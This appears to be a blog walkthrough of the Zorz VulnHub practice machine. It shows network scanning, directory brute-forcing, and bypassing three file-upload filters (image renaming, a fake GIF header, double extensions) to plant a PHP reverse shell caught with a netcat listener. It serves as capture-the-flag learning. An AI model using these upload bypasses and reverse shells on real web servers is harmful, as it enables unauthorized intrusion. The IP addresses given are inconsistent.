Hack the Zorz VM ()CTF Challenge


Zorz is another VM that will challenge your webapp skills. There are 3 separate challenges (web pages) on this machine. It should be pretty straight forward.  This machine will probably test your web app skills once again. There are 3 different pages that should be focused on(you will see). Your goal is to successfully upload a web-shell or malicious file to the server.
This machine (zorz) does not runs on vmware. So, in case you are using your Kali Linux in vmware(for attacking), you will probably need to run Zorz on a different system in Virtual Box and of course in the same network.
You can download this machine from here: https://www.vulnhub.com/?q=zorz&sort=date-des&type=vm
Penetration Methodolgies:
§  Network Scaning (Netdiscover, Nmap)
§  Exploting Each level of File Uploading vulnbility
§  Directory brute force attack (Dirb)
§  Obtain Netcat session for each level.

Walkthrough
Let’s start with our all time favourite netdiscover to get the victim machine’s IP.
netdiscover


So, our target is located on 192.168.1.8. Let’s quickly do an nmap scan to get an idea of open ports.
nmap -A 192.168.1.129



Ok, so we have port 22 and port 80 open. Let’s visit the IP on our browser.


And it opened up like a beautiful treasure! As you can see, according this web page “contact Support” here we can attached our file and can discuss our problem.
So, here is what we did.
Traverse to the directory: /usr/share/webshells/php/php-reverse-shell.php
Open it with text editor and add listening IP and port and save this file as php-reverse-shell.jpg and start netcat at listening port.





Next we try to upload this file and our shell gets uploaded successfully.

But we have no idea as to where our file gets uploaded on the server. In order to get the location/directory of our shell, we run dirb using the dictionary /usr/share/dirb/wordlists/big.txt
dirb http://192.168.1.129 /usr/share/dirb/wordlists/big.txt

And we get to know of a directory named “uploads2”. Upon visiting this directory, we do not find our shell.php file there. Thus we try to manipulate the directory name and visit the directory”uploads1”. Click the php file to open it.


We have successfully exploited the level 1 security and we have a netcat session running right before us.
nc -lvp 1234


Now let’s go for the second level (Zorz Image Uploader 2) and try uploading the same file there.

But this time we got error, here we can upload only image with .jpg, png and GIF extension.  


Time for some more tricks. Let us open the php-reverse-shell.php file in a text editor and just before our script, add the string “GIF98” and rename the file as “php-reverse-shell.php.jpg” and try to upload it once again.

And this time It got upload successfully !!!!!!!!!!!


Time to execute the backdoor and this time the location of our file is “uploads2”. Let’s open it.

As you can observe again we got new netcat session and compromised victim’s VM successfully.
nc -lvp 1234

Now for our final task, we open the third level (Zorz Image Uploader 3) in order to upload backdoor but here clearly Note is given for the file type you will be uploading. The uploading file should be an image with .jpeg, jpg and png extension and less than 100kb.

And without any edits to our “php-reverse-shell.php” file, we try uploading it here. The file uploads successfully once again. And this time the directory it has been uploaded to is uploads3.


Let’s visit /uploads3 directory to execute the uploaded backdoor and try to obtain netcat session once again.
As you can observe again we got new netcat session and compromised victim’s VM successfully.
nc -lvp 1234
Mission accomplished. We have successfully bypassed all the three levels of security on this machine.

0 comments:

Post a Comment